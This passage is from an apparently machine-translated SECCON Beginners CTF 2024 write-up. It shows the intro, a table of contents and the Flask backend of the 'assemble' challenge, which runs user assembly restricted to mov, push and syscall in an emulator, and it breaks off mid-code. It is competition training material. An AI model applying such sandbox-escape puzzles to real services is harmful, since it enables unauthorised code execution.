{"componentChunkName":"component---src-templates-post-template-js","path":"/ctf-sec4b-2024-en","result":{"data":{"markdownRemark":{"id":"b92888a2-704c-5a29-92d6-d9e2b42f900b","html":"<blockquote>\n<p>This page has been machine-translated from the <a href=\"/ctf-sec4b-2024\">original page</a>.</p>\n</blockquote>\n<p>I participated in SECCON Beginners CTF 2024, held starting June 15, 2024, with the team 0nePadding.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/4c29019c115db331c70a25fe7b215f66/cdef6/image-20240616143310658.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 27.500000000000004%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAGCAYAAADDl76dAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAxUlEQVQY05WQ2Q7CIBRE+f9/01SNiTEuT42lrWDpItvtWOiiib54kxOGbbgDOxxPSDY7rNYbJMl20HsI+UCovu/xbzHO88FA4i4khBDgvMCjUnGTiKLpP7Bw6Vd5T0uXQXv6YJrPDxLNEFjTtlE45yLe+2hkjMUt48No3vGnLwjnK1VHtDaw1sFYG01ZXpTRSGuN50DQo6HB+XKFqpuv/wya8xJpmqEoBcq7hFLNGHlsmRbGSH7pNOy7af5JSNZ23ZJuXn8BG8XVZ45Kz78AAAAASUVORK5CYII='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/4c29019c115db331c70a25fe7b215f66/8ac56/image-20240616143310658.webp 240w,\n/static/4c29019c115db331c70a25fe7b215f66/d3be9/image-20240616143310658.webp 480w,\n/static/4c29019c115db331c70a25fe7b215f66/e46b2/image-20240616143310658.webp 960w,\n/static/4c29019c115db331c70a25fe7b215f66/5231b/image-20240616143310658.webp 1163w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            
srcset=\"/static/4c29019c115db331c70a25fe7b215f66/8ff5a/image-20240616143310658.png 240w,\n/static/4c29019c115db331c70a25fe7b215f66/e85cb/image-20240616143310658.png 480w,\n/static/4c29019c115db331c70a25fe7b215f66/d9199/image-20240616143310658.png 960w,\n/static/4c29019c115db331c70a25fe7b215f66/cdef6/image-20240616143310658.png 1163w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/4c29019c115db331c70a25fe7b215f66/d9199/image-20240616143310658.png\"\n            alt=\"image-20240616143310658\"\n            title=\"image-20240616143310658\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>We finished in 16th place out of 962 teams.</p>\n<p>Last year we placed 35th, so this is our best result to date.</p>\n<p>This time I solved not only Rev challenges but also several Crypto and Pwn ones, so I’ll write a brief writeup.</p>\n<!-- omit in toc -->\n<h2 id=\"table-of-contents\" style=\"position:relative;\"><a href=\"#table-of-contents\" aria-label=\"table of contents permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Table of Contents</h2>\n<ul>\n<li>\n<p><a href=\"#assemblerev\">assemble(Rev)</a></p>\n<ul>\n<li><a href=\"#setting-up-a-local-environment\">Setting Up a Local Environment</a></li>\n<li><a 
href=\"#stage-1-stage-2\">Stage 1, Stage 2</a></li>\n<li><a href=\"#stage-3\">Stage 3</a></li>\n<li><a href=\"#stage-4\">Stage 4</a></li>\n</ul>\n</li>\n<li><a href=\"#cha-ll-engerev\">cha-ll-enge(Rev)</a></li>\n<li>\n<p><a href=\"#constructrev\">construct(Rev)</a></p>\n<ul>\n<li><a href=\"#check-for-command-line-arguments\">Check for Command-Line Arguments</a></li>\n<li><a href=\"#validate-input-length-of-0x20-characters\">Validate Input Length of 0x20 Characters</a></li>\n<li><a href=\"#validate-input-two-characters-at-a-time\">Validate Input Two Characters at a Time</a></li>\n</ul>\n</li>\n<li><a href=\"#former-seccomprev\">former-seccomp(Rev)</a></li>\n<li><a href=\"#simpleoverflowpwn\">simpleoverflow(Pwn)</a></li>\n<li><a href=\"#simpleoverwritepwn\">simpleoverwrite(Pwn)</a></li>\n<li><a href=\"#pure-and-easypwn\">pure-and-easy(Pwn)</a></li>\n<li><a href=\"#safe-primecrypto\">Safe Prime(Crypto)</a></li>\n<li><a href=\"#mathcrypto\">math(Crypto)</a></li>\n<li><a href=\"#commentatormisc\">commentator(Misc)</a></li>\n<li><a href=\"#summary\">Summary</a></li>\n</ul>\n<h2 id=\"assemblerev\" style=\"position:relative;\"><a href=\"#assemblerev\" aria-label=\"assemblerev permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>assemble(Rev)</h2>\n<blockquote>\n<p>Write assembly code in Intel syntax and retrieve the contents of flag.txt!</p>\n</blockquote>\n<p>Accessing the provided URL launches a web application like this.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      
style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/76b3617e8f3a7b4bb8026a8313240a45/d56b5/image-20240616104309228.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 67.5%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,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'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/76b3617e8f3a7b4bb8026a8313240a45/8ac56/image-20240616104309228.webp 240w,\n/static/76b3617e8f3a7b4bb8026a8313240a45/d3be9/image-20240616104309228.webp 480w,\n/static/76b3617e8f3a7b4bb8026a8313240a45/e46b2/image-20240616104309228.webp 960w,\n/static/76b3617e8f3a7b4bb8026a8313240a45/34ce3/image-20240616104309228.webp 1215w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/76b3617e8f3a7b4bb8026a8313240a45/8ff5a/image-20240616104309228.png 240w,\n/static/76b3617e8f3a7b4bb8026a8313240a45/e85cb/image-20240616104309228.png 480w,\n/static/76b3617e8f3a7b4bb8026a8313240a45/d9199/image-20240616104309228.png 960w,\n/static/76b3617e8f3a7b4bb8026a8313240a45/d56b5/image-20240616104309228.png 1215w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/76b3617e8f3a7b4bb8026a8313240a45/d9199/image-20240616104309228.png\"\n            alt=\"image-20240616104309228\"\n            title=\"image-20240616104309228\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n      
  </picture>\n  </a>\n    </span></p>\n<p>The backend of this application is implemented with the following code.</p>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\"><span class=\"token keyword\">import</span> os\n<span class=\"token keyword\">import</span> shutil\n<span class=\"token keyword\">import</span> time\n<span class=\"token keyword\">import</span> uuid\n\n<span class=\"token keyword\">from</span> flask <span class=\"token keyword\">import</span> Flask<span class=\"token punctuation\">,</span> render_template<span class=\"token punctuation\">,</span> request<span class=\"token punctuation\">,</span> session<span class=\"token punctuation\">,</span> redirect\n<span class=\"token keyword\">from</span> qiling <span class=\"token keyword\">import</span> Qiling\n<span class=\"token keyword\">from</span> qiling<span class=\"token punctuation\">.</span>const <span class=\"token keyword\">import</span> QL_ARCH<span class=\"token punctuation\">,</span> QL_OS<span class=\"token punctuation\">,</span> QL_VERBOSE\n<span class=\"token keyword\">from</span> qiling<span class=\"token punctuation\">.</span>extensions <span class=\"token keyword\">import</span> pipe\n\n<span class=\"token keyword\">from</span> pwn <span class=\"token keyword\">import</span> asm\n\napp <span class=\"token operator\">=</span> Flask<span class=\"token punctuation\">(</span>__name__<span class=\"token punctuation\">)</span>\n\napp<span class=\"token punctuation\">.</span>secret_key <span class=\"token operator\">=</span> os<span class=\"token punctuation\">.</span>urandom<span class=\"token punctuation\">(</span><span class=\"token number\">24</span><span class=\"token punctuation\">)</span>\n\n\n<span class=\"token decorator annotation punctuation\">@app<span class=\"token punctuation\">.</span>route</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"/\"</span><span class=\"token 
punctuation\">,</span> methods<span class=\"token operator\">=</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"GET\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span>\n<span class=\"token keyword\">def</span> <span class=\"token function\">index</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">:</span>\n    <span class=\"token keyword\">if</span> <span class=\"token string\">\"id\"</span> <span class=\"token keyword\">not</span> <span class=\"token keyword\">in</span> session<span class=\"token punctuation\">:</span>\n        session<span class=\"token punctuation\">[</span><span class=\"token string\">\"id\"</span><span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> <span class=\"token string\">\"1\"</span>\n    <span class=\"token keyword\">return</span> render_template<span class=\"token punctuation\">(</span><span class=\"token string\">\"index.html\"</span><span class=\"token punctuation\">,</span> <span class=\"token builtin\">id</span><span class=\"token operator\">=</span>session<span class=\"token punctuation\">[</span><span class=\"token string\">\"id\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span>\n\n\n<span class=\"token decorator annotation punctuation\">@app<span class=\"token punctuation\">.</span>route</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"/reset\"</span><span class=\"token punctuation\">,</span> methods<span class=\"token operator\">=</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"GET\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span>\n<span class=\"token keyword\">def</span> <span class=\"token function\">reset</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span 
class=\"token punctuation\">:</span>\n    session<span class=\"token punctuation\">[</span><span class=\"token string\">\"id\"</span><span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> <span class=\"token string\">\"1\"</span>\n    <span class=\"token keyword\">return</span> redirect<span class=\"token punctuation\">(</span><span class=\"token string\">\"/\"</span><span class=\"token punctuation\">)</span>\n\n\n<span class=\"token decorator annotation punctuation\">@app<span class=\"token punctuation\">.</span>route</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"/\"</span><span class=\"token punctuation\">,</span> methods<span class=\"token operator\">=</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"POST\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span>\n<span class=\"token keyword\">def</span> <span class=\"token function\">submit</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">:</span>\n    code <span class=\"token operator\">=</span> request<span class=\"token punctuation\">.</span>form<span class=\"token punctuation\">[</span><span class=\"token string\">\"code\"</span><span class=\"token punctuation\">]</span>\n    <span class=\"token keyword\">if</span> <span class=\"token builtin\">len</span><span class=\"token punctuation\">(</span>code<span class=\"token punctuation\">.</span>strip<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">==</span> <span class=\"token number\">0</span><span class=\"token punctuation\">:</span>\n        <span class=\"token keyword\">return</span> render_template<span class=\"token punctuation\">(</span><span class=\"token string\">\"index.html\"</span><span class=\"token punctuation\">,</span> <span class=\"token 
builtin\">id</span><span class=\"token operator\">=</span>session<span class=\"token punctuation\">[</span><span class=\"token string\">\"id\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> error<span class=\"token operator\">=</span><span class=\"token string\">\"Please input the code.\"</span><span class=\"token punctuation\">)</span>\n    <span class=\"token keyword\">if</span> <span class=\"token string\">\";\"</span> <span class=\"token keyword\">in</span> code<span class=\"token punctuation\">:</span>\n        <span class=\"token keyword\">return</span> render_template<span class=\"token punctuation\">(</span><span class=\"token string\">\"index.html\"</span><span class=\"token punctuation\">,</span> <span class=\"token builtin\">id</span><span class=\"token operator\">=</span>session<span class=\"token punctuation\">[</span><span class=\"token string\">\"id\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> error<span class=\"token operator\">=</span><span class=\"token string\">\"Please remove the semicolon.\"</span><span class=\"token punctuation\">)</span>\n    lines <span class=\"token operator\">=</span> code<span class=\"token punctuation\">.</span>splitlines<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\n    <span class=\"token keyword\">if</span> <span class=\"token builtin\">len</span><span class=\"token punctuation\">(</span>lines<span class=\"token punctuation\">)</span> <span class=\"token operator\">></span> <span class=\"token number\">25</span><span class=\"token punctuation\">:</span>\n        <span class=\"token keyword\">return</span> render_template<span class=\"token punctuation\">(</span>\n            <span class=\"token string\">\"index.html\"</span><span class=\"token punctuation\">,</span>\n            <span class=\"token builtin\">id</span><span class=\"token operator\">=</span>session<span class=\"token 
punctuation\">[</span><span class=\"token string\">\"id\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>\n            error<span class=\"token operator\">=</span><span class=\"token string\">\"Too many instructions. Please use less than 25 instructions.\"</span><span class=\"token punctuation\">,</span>\n        <span class=\"token punctuation\">)</span>\n    <span class=\"token keyword\">for</span> line <span class=\"token keyword\">in</span> lines<span class=\"token punctuation\">:</span>\n        <span class=\"token keyword\">try</span><span class=\"token punctuation\">:</span>\n            order <span class=\"token operator\">=</span> line<span class=\"token punctuation\">.</span>split<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">[</span><span class=\"token number\">0</span><span class=\"token punctuation\">]</span>\n            <span class=\"token keyword\">if</span> order <span class=\"token keyword\">not</span> <span class=\"token keyword\">in</span> <span class=\"token punctuation\">[</span><span class=\"token string\">\"mov\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"push\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"syscall\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">:</span>\n                <span class=\"token keyword\">return</span> render_template<span class=\"token punctuation\">(</span>\n                    <span class=\"token string\">\"index.html\"</span><span class=\"token punctuation\">,</span>\n                    <span class=\"token builtin\">id</span><span class=\"token operator\">=</span>session<span class=\"token punctuation\">[</span><span class=\"token string\">\"id\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>\n                    error<span class=\"token 
operator\">=</span><span class=\"token string\">\"Invalid instructions are included. Please use only mov, push, syscall.\"</span><span class=\"token punctuation\">,</span>\n                <span class=\"token punctuation\">)</span>\n        <span class=\"token keyword\">except</span> Exception<span class=\"token punctuation\">:</span>\n            <span class=\"token keyword\">continue</span>\n\n    <span class=\"token keyword\">try</span><span class=\"token punctuation\">:</span>\n        asm_code <span class=\"token operator\">=</span> asm<span class=\"token punctuation\">(</span>code<span class=\"token punctuation\">,</span> arch<span class=\"token operator\">=</span><span class=\"token string\">\"amd64\"</span><span class=\"token punctuation\">,</span> os<span class=\"token operator\">=</span><span class=\"token string\">\"linux\"</span><span class=\"token punctuation\">)</span>\n    <span class=\"token keyword\">except</span> Exception<span class=\"token punctuation\">:</span>\n        <span class=\"token keyword\">return</span> render_template<span class=\"token punctuation\">(</span>\n            <span class=\"token string\">\"index.html\"</span><span class=\"token punctuation\">,</span> <span class=\"token builtin\">id</span><span class=\"token operator\">=</span>session<span class=\"token punctuation\">[</span><span class=\"token string\">\"id\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> error<span class=\"token operator\">=</span><span class=\"token string\">\"Failed to assemble the code. 
Please check the code.\"</span>\n        <span class=\"token punctuation\">)</span>\n\n    <span class=\"token comment\"># Debug</span>\n    logpath <span class=\"token operator\">=</span> os<span class=\"token punctuation\">.</span>path<span class=\"token punctuation\">.</span>join<span class=\"token punctuation\">(</span><span class=\"token string\">\"logs\"</span><span class=\"token punctuation\">,</span> <span class=\"token builtin\">str</span><span class=\"token punctuation\">(</span>time<span class=\"token punctuation\">.</span>time<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">+</span> <span class=\"token string\">\".log\"</span><span class=\"token punctuation\">)</span>\n    logf <span class=\"token operator\">=</span> <span class=\"token builtin\">open</span><span class=\"token punctuation\">(</span>logpath<span class=\"token punctuation\">,</span> <span class=\"token string\">\"w\"</span><span class=\"token punctuation\">)</span>\n    logf<span class=\"token punctuation\">.</span>write<span class=\"token punctuation\">(</span>code <span class=\"token operator\">+</span> <span class=\"token string\">\"\\n\"</span> <span class=\"token operator\">*</span> <span class=\"token number\">2</span><span class=\"token punctuation\">)</span>\n    logf<span class=\"token punctuation\">.</span>close<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\n\n    dirname <span class=\"token operator\">=</span> <span class=\"token builtin\">str</span><span class=\"token punctuation\">(</span>uuid<span class=\"token punctuation\">.</span>uuid4<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>\n    os<span class=\"token punctuation\">.</span>mkdir<span class=\"token punctuation\">(</span>dirname<span class=\"token punctuation\">)</span>\n    <span class=\"token 
keyword\">if</span> session<span class=\"token punctuation\">[</span><span class=\"token string\">\"id\"</span><span class=\"token punctuation\">]</span> <span class=\"token operator\">==</span> <span class=\"token string\">\"4\"</span><span class=\"token punctuation\">:</span>\n        f <span class=\"token operator\">=</span> <span class=\"token builtin\">open</span><span class=\"token punctuation\">(</span>os<span class=\"token punctuation\">.</span>path<span class=\"token punctuation\">.</span>join<span class=\"token punctuation\">(</span>dirname<span class=\"token punctuation\">,</span> <span class=\"token string\">\"flag.txt\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"w\"</span><span class=\"token punctuation\">)</span>\n        flag <span class=\"token operator\">=</span> os<span class=\"token punctuation\">.</span>environ<span class=\"token punctuation\">.</span>get<span class=\"token punctuation\">(</span><span class=\"token string\">\"FLAG\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"ctf4b{fake_flag}\"</span><span class=\"token punctuation\">)</span>\n        f<span class=\"token punctuation\">.</span>write<span class=\"token punctuation\">(</span>flag<span class=\"token punctuation\">)</span>\n        f<span class=\"token punctuation\">.</span>close<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\n    ql <span class=\"token operator\">=</span> Qiling<span class=\"token punctuation\">(</span>\n        code<span class=\"token operator\">=</span>asm_code<span class=\"token punctuation\">,</span>\n        rootfs<span class=\"token operator\">=</span>dirname<span class=\"token punctuation\">,</span>\n        archtype<span class=\"token operator\">=</span>QL_ARCH<span class=\"token punctuation\">.</span>X8664<span class=\"token punctuation\">,</span>\n        ostype<span class=\"token 
operator\">=</span>QL_OS<span class=\"token punctuation\">.</span>LINUX<span class=\"token punctuation\">,</span>\n        verbose<span class=\"token operator\">=</span>QL_VERBOSE<span class=\"token punctuation\">.</span>DEFAULT<span class=\"token punctuation\">,</span>\n        log_file<span class=\"token operator\">=</span>logpath<span class=\"token punctuation\">,</span>\n    <span class=\"token punctuation\">)</span>\n\n    ql<span class=\"token punctuation\">.</span>os<span class=\"token punctuation\">.</span>stdout <span class=\"token operator\">=</span> pipe<span class=\"token punctuation\">.</span>SimpleOutStream<span class=\"token punctuation\">(</span><span class=\"token number\">0</span><span class=\"token punctuation\">)</span>\n\n    <span class=\"token keyword\">try</span><span class=\"token punctuation\">:</span>\n        ql<span class=\"token punctuation\">.</span>run<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\n    <span class=\"token keyword\">except</span> Exception<span class=\"token punctuation\">:</span>\n        <span class=\"token keyword\">return</span> render_template<span class=\"token punctuation\">(</span>\n            <span class=\"token string\">\"index.html\"</span><span class=\"token punctuation\">,</span>\n            <span class=\"token builtin\">id</span><span class=\"token operator\">=</span>session<span class=\"token punctuation\">[</span><span class=\"token string\">\"id\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>\n            error<span class=\"token operator\">=</span><span class=\"token string\">\"Failed to execute the code. 
Please check the code.\"</span><span class=\"token punctuation\">,</span>\n        <span class=\"token punctuation\">)</span>\n\n    shutil<span class=\"token punctuation\">.</span>rmtree<span class=\"token punctuation\">(</span>dirname<span class=\"token punctuation\">,</span> ignore_errors<span class=\"token operator\">=</span><span class=\"token boolean\">True</span><span class=\"token punctuation\">)</span>\n\n    <span class=\"token keyword\">try</span><span class=\"token punctuation\">:</span>\n        stdout<span class=\"token operator\">=</span>ql<span class=\"token punctuation\">.</span>os<span class=\"token punctuation\">.</span>stdout<span class=\"token punctuation\">.</span>read<span class=\"token punctuation\">(</span><span class=\"token number\">1024</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span>decode<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span>strip<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\n    <span class=\"token keyword\">except</span> Exception<span class=\"token punctuation\">:</span>\n        stdout <span class=\"token operator\">=</span> <span class=\"token builtin\">str</span><span class=\"token punctuation\">(</span>ql<span class=\"token punctuation\">.</span>os<span class=\"token punctuation\">.</span>stdout<span class=\"token punctuation\">.</span>read<span class=\"token punctuation\">(</span><span class=\"token number\">1024</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>\n\n    message <span class=\"token operator\">=</span> <span class=\"token string\">\"Successfully executed the code!\"</span>\n    <span class=\"token keyword\">if</span> session<span class=\"token punctuation\">[</span><span class=\"token string\">\"id\"</span><span class=\"token punctuation\">]</span> <span class=\"token operator\">==</span> <span class=\"token 
string\">\"1\"</span> <span class=\"token keyword\">and</span> ql<span class=\"token punctuation\">.</span>arch<span class=\"token punctuation\">.</span>regs<span class=\"token punctuation\">.</span>read<span class=\"token punctuation\">(</span><span class=\"token string\">\"rax\"</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">==</span> <span class=\"token number\">0x123</span><span class=\"token punctuation\">:</span>\n        message <span class=\"token operator\">=</span> <span class=\"token string\">\"Congratulation! Let's proceed to the next stage!\"</span>\n        session<span class=\"token punctuation\">[</span><span class=\"token string\">\"id\"</span><span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> <span class=\"token string\">\"2\"</span>\n    <span class=\"token keyword\">elif</span> session<span class=\"token punctuation\">[</span><span class=\"token string\">\"id\"</span><span class=\"token punctuation\">]</span> <span class=\"token operator\">==</span> <span class=\"token string\">\"2\"</span> <span class=\"token keyword\">and</span> ql<span class=\"token punctuation\">.</span>arch<span class=\"token punctuation\">.</span>regs<span class=\"token punctuation\">.</span>read<span class=\"token punctuation\">(</span><span class=\"token string\">\"rax\"</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">==</span> <span class=\"token number\">0x123</span> <span class=\"token keyword\">and</span> ql<span class=\"token punctuation\">.</span>arch<span class=\"token punctuation\">.</span>stack_pop<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">==</span> <span class=\"token number\">0x123</span><span class=\"token punctuation\">:</span>\n        message <span class=\"token operator\">=</span> <span class=\"token string\">\"Congratulation! 
Let's proceed to the next stage!\"</span>\n        session<span class=\"token punctuation\">[</span><span class=\"token string\">\"id\"</span><span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> <span class=\"token string\">\"3\"</span>\n    <span class=\"token keyword\">elif</span> session<span class=\"token punctuation\">[</span><span class=\"token string\">\"id\"</span><span class=\"token punctuation\">]</span> <span class=\"token operator\">==</span> <span class=\"token string\">\"3\"</span> <span class=\"token keyword\">and</span> <span class=\"token string\">\"Hello\"</span> <span class=\"token keyword\">in</span> stdout<span class=\"token punctuation\">:</span>\n        message <span class=\"token operator\">=</span> <span class=\"token string\">\"Congratulation! Let's proceed to the next stage!\"</span>\n        session<span class=\"token punctuation\">[</span><span class=\"token string\">\"id\"</span><span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> <span class=\"token string\">\"4\"</span>\n    <span class=\"token keyword\">elif</span> session<span class=\"token punctuation\">[</span><span class=\"token string\">\"id\"</span><span class=\"token punctuation\">]</span> <span class=\"token operator\">==</span> <span class=\"token string\">\"4\"</span> <span class=\"token keyword\">and</span> os<span class=\"token punctuation\">.</span>getenv<span class=\"token punctuation\">(</span><span class=\"token string\">\"FLAG\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"ctf4b{fake_flag}\"</span><span class=\"token punctuation\">)</span> <span class=\"token keyword\">in</span> stdout<span class=\"token punctuation\">:</span>\n        message <span class=\"token operator\">=</span> <span class=\"token string\">\"Congratulation! 
You have completed all stages!\"</span>\n\n    <span class=\"token keyword\">return</span> render_template<span class=\"token punctuation\">(</span>\n        <span class=\"token string\">\"index.html\"</span><span class=\"token punctuation\">,</span>\n        <span class=\"token builtin\">id</span><span class=\"token operator\">=</span>session<span class=\"token punctuation\">[</span><span class=\"token string\">\"id\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>\n        message<span class=\"token operator\">=</span>message<span class=\"token punctuation\">,</span>\n        stdout<span class=\"token operator\">=</span>stdout<span class=\"token punctuation\">,</span>\n        rax<span class=\"token operator\">=</span><span class=\"token builtin\">hex</span><span class=\"token punctuation\">(</span>ql<span class=\"token punctuation\">.</span>arch<span class=\"token punctuation\">.</span>regs<span class=\"token punctuation\">.</span>read<span class=\"token punctuation\">(</span><span class=\"token string\">\"rax\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span>\n        rbx<span class=\"token operator\">=</span><span class=\"token builtin\">hex</span><span class=\"token punctuation\">(</span>ql<span class=\"token punctuation\">.</span>arch<span class=\"token punctuation\">.</span>regs<span class=\"token punctuation\">.</span>read<span class=\"token punctuation\">(</span><span class=\"token string\">\"rbx\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span>\n        rcx<span class=\"token operator\">=</span><span class=\"token builtin\">hex</span><span class=\"token punctuation\">(</span>ql<span class=\"token punctuation\">.</span>arch<span class=\"token punctuation\">.</span>regs<span class=\"token punctuation\">.</span>read<span class=\"token 
punctuation\">(</span><span class=\"token string\">\"rcx\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span>\n        rdx<span class=\"token operator\">=</span><span class=\"token builtin\">hex</span><span class=\"token punctuation\">(</span>ql<span class=\"token punctuation\">.</span>arch<span class=\"token punctuation\">.</span>regs<span class=\"token punctuation\">.</span>read<span class=\"token punctuation\">(</span><span class=\"token string\">\"rdx\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span>\n        rsi<span class=\"token operator\">=</span><span class=\"token builtin\">hex</span><span class=\"token punctuation\">(</span>ql<span class=\"token punctuation\">.</span>arch<span class=\"token punctuation\">.</span>regs<span class=\"token punctuation\">.</span>read<span class=\"token punctuation\">(</span><span class=\"token string\">\"rsi\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span>\n        rdi<span class=\"token operator\">=</span><span class=\"token builtin\">hex</span><span class=\"token punctuation\">(</span>ql<span class=\"token punctuation\">.</span>arch<span class=\"token punctuation\">.</span>regs<span class=\"token punctuation\">.</span>read<span class=\"token punctuation\">(</span><span class=\"token string\">\"rdi\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span>\n        rbp<span class=\"token operator\">=</span><span class=\"token builtin\">hex</span><span class=\"token punctuation\">(</span>ql<span class=\"token punctuation\">.</span>arch<span class=\"token punctuation\">.</span>regs<span class=\"token punctuation\">.</span>read<span class=\"token punctuation\">(</span><span class=\"token 
